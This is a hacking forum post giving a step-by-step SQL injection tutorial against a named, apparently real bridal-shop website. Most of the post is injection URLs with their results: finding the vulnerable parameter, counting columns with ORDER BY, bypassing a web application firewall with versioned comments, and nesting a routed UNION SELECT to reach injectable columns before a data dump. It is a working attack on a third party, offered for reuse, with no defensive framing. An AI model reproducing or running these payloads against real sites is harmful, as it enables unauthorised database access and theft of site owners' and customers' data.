Register

If you already have an account with us, please use the login panel below to access your account.

Results 1 to 1 of 1
  1. #1

    Radioactive Icon [New]Routed query based SQL- injection tutorial-by spirit[/noob friendly]



    hello provendorz members


    so, today i am here to demonstrate a tutorial on routed query based sql- injection

    php code:
    target website:-www.impressionbridal.com/catalog.php?cat=22 


    so, lets try to inject it

    php code:
    http://www.impressionbridal.com/catalog.php?cat=22' [error] 

    lets try to balance our query
    php code:
    http://www.impressionbridal.com/catalog.php?cat=22'-- - 

    great , now lets try to find the total number of columns.
    php code:
    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+1-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+2-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+3-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+4-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+6-- - [error] 

    so, their are 5 numbers of columns now lets try to find the vulnerable one with our union select command.



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+u nion+s elect+1,2,3,4,5-- -  [waf detected] 
    so, waf lets bypass it check my this thread
    ==>
    some basics ways to bypass waf
    <==



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+1,2,3,4,5-- -  [waf bypassed] 
    waf bypassed great.
    check my this thread first.


    ==>
    [tutorial]sql-injection::new way to get vulnerable column by brute forcing columns
    <==

    nothing works sad , lets try routed based injection

    after column 1 try to false the query by single quote " ' "again.



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+1',2,3,4,5-- - [error] 
    so now we got the error so lets try routed query based injection

    now suppose that 1 is your new parameter so for balancing we will put 1 under double quotes like this:-"1" and then balance our query with -- - or anything

    lets try it



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' -- - [doublequote],2,3,4,5-- - [no-error] 
    here hf is blocking double quote " so i wrote [doublequote]

    so, lets find the total number of columns using order by clause
    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 1-- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 17 -- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 18 -- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 'order by 19 -- - [doublequote],2,3,4,5-- - [error] 


    means their are 18 numbers of columns, now lets use our union select statement.

    ps:waf is here also.
    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] .1 '+/*!12345u nion*/+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- - [doublequote],2,3,4,5-- - [no-error] 


    so, columns 12,13,14 are vulnerable


    lets try to use our simple dios



    Last edited by The Master; at .

 

 

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •